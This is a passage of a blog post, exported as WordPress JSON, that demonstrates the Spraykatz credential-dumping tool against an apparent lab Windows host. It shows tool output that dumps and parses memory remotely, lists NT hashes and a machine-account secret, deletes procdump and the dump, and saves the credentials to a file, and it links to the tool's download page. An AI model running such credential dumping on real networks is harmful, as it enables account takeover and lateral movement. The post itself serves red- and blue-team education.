remotely&#8230;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; machine:  10.0.0.201<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  domain:  WIN10CLI02<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;username:  blackhat<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  nthash:  <span style=\"color:#00b050\">329153f560eb329c0e1deea55e88a1e9<span style=\"color:white\"><br \/>\n<\/span><\/span><\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; machine:  10.0.0.201<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  domain:  WIN2019<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;username:  WIN10CLI02$<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  nthash:  <span style=\"color:#00b050\">fcdc607666845acba172b460939f8fa9<span style=\"color:white\"><br \/>\n<\/span><\/span><\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; machine:  10.0.0.201<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  domain:  win2019.priv<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;username:  WIN10CLI02$<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;password:  <span style=\"color:#00b050\">31d47f5578cd912fd4e6d88a1bc86be46d7d37c2ffd05251b1c98cdd77e71cc37f08504087f18e572162655604adac497b156fdcb9b20b56f0ec5fe3c64b42b96cfbf6e26b5e8017d215479a2d456cf902e36ddad8dae64319f3d9fa79c1dee884c887834af056e459bf3ce3094dad4e1004985518b112e4dbfe24b4eb90a37248d71ef3a79507f4ad68d4b1a233c19448a56f06763079405b08d6e300a5a4e9eb11dc219ca52c5d3edead8fd1ef3ee7b211cbf6af66cc45ed6f090e4f1eb7968cf5cfffdbe06e919440b51056b5586869fefea7296a4c437c2faf240b90f86a4ebdf450fd2b8990061fd58abeef6e76<span style=\"color:white\"><br \/>\n<\/span><\/span><\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; machine:  10.0.0.201<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  domain:  WIN2019<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;username:  han<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  nthash:  <span style=\"color:#00b050\">329153f560eb329c0e1deea55e88a1e9<span style=\"color:white\"><br \/>\n<\/span><\/span><\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; machine:  10.0.0.201<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  domain:  WIN2019<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;username:  root<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  nthash:  <span style=\"color:#00b050\">329153f560eb329c0e1deea55e88a1e9<span style=\"color:white\"><br \/>\n<\/span><\/span><\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>[#]   Closing dump file on 10.0.0.201&#8230;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>[#]   Deleting procdump on 10.0.0.201&#8230;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>[#]   Deleting dump on 10.0.0.201&#8230;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>[+] Credentials logged into: \/root\/spraykatz\/misc\/results\/creds.txt<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>[+] Exiting Gracefully&#8230;<\/strong><\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<p>On the target system, we can retrieve the nthash for the following accounts:<\/p>\n<ul>\n<li>Users accounts who already opened a session on the target system:<\/li>\n<\/ul>\n<p><img decoding=\"async\" src=\"http:\/\/identitycosmos.com\/wp-content\/uploads\/2020\/03\/032820_1728_Spraykatzaf3.png\" alt=\"\"><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/identitycosmos.com\/wp-content\/uploads\/2020\/03\/032820_1728_Spraykatzaf4.png\" alt=\"\"><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/identitycosmos.com\/wp-content\/uploads\/2020\/03\/032820_1728_Spraykatzaf5.png\" alt=\"\"><\/p>\n<ul>\n<li>Computer account for the target system:<\/li>\n<\/ul>\n<p><img decoding=\"async\" src=\"http:\/\/identitycosmos.com\/wp-content\/uploads\/2020\/03\/032820_1728_Spraykatzaf6.png\" alt=\"\"><\/p>\n<p>These are some additional information about how to use SprayKatz:<\/p>\n<ul>\n<li>Mandatory arguments<\/li>\n<\/ul>\n<p><img decoding=\"async\" src=\"http:\/\/identitycosmos.com\/wp-content\/uploads\/2020\/03\/032820_1728_Spraykatzaf7.png\" alt=\"\"><\/p>\n<ul>\n<li>Optional arguments<\/li>\n<\/ul>\n<p><img decoding=\"async\" src=\"http:\/\/identitycosmos.com\/wp-content\/uploads\/2020\/03\/032820_1728_Spraykatzaf8.png\" alt=\"\"><\/p>\n<h1>Spraykatz usefull information<\/h1>\n<h2>Download page from GitHub<\/h2>\n<p>GitHub page: <a href=\"https:\/\/github.com\/aas-n\/spraykatz\">https:\/\/github.com\/aas-n\/spraykatz<\/a><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/identitycosmos.com\/wp-content\/uploads\/2020\/03\/032820_1728_Spraykatzaf9.png\" alt=\"\"><\/p>\n<h2>Author Twitter account<\/h2>\n<p><a href=\"https:\/\/twitter.com\/lydericlefebvre\">https:\/\/twitter.com\/lydericlefebvre<\/a><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/identitycosmos.com\/wp-content\/uploads\/2020\/03\/032820_1728_Spraykatzaf10.png\" alt=\"\"><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Introduction to Spraykatz As you may know, password hash dump is a very useful method to perform lateral movement or privilege escalation on a network. If you are using Active Directory, this method will be used by a lot of modern malware which include some code pieces from very known security tools like Mimikatz for [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4,1,7],"tags":[14,55,181,199,225],"class_list":["post-2322","post","type-post","status-publish","format-standard","hentry","category-cybersecurity","category-non-classe","category-technique","tag-active-directory","tag-blueteam","tag-password-spray","tag-redteam","tag-spraykatz"],"_links":{"self":[{"href":"https:\/\/identitycosmos.com\/index.php\/wp-json\/wp\/v2\/posts\/2322","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/identitycosmos.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/identitycosmos.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/identitycosmos.com\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/identitycosmos.com\/index.php\/wp-json\/wp\/v2\/comments?post=2322"}],"version-history":[{"count":0,"href":"https:\/\/identitycosmos.com\/index.php\/wp-json\/wp\/v2\/posts\/2322\/revisions"}],"wp:attachment":[{"href":"https:\/\/identitycosmos.com\/index.php\/wp-json\/wp\/v2\/media?parent=2322"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/identitycosmos.com\/index.php\/wp-json\/wp\/v2\/categories?post=2322"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/identitycosmos.com\/index.php\/wp-json\/wp\/v2\/tags?post=2322"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}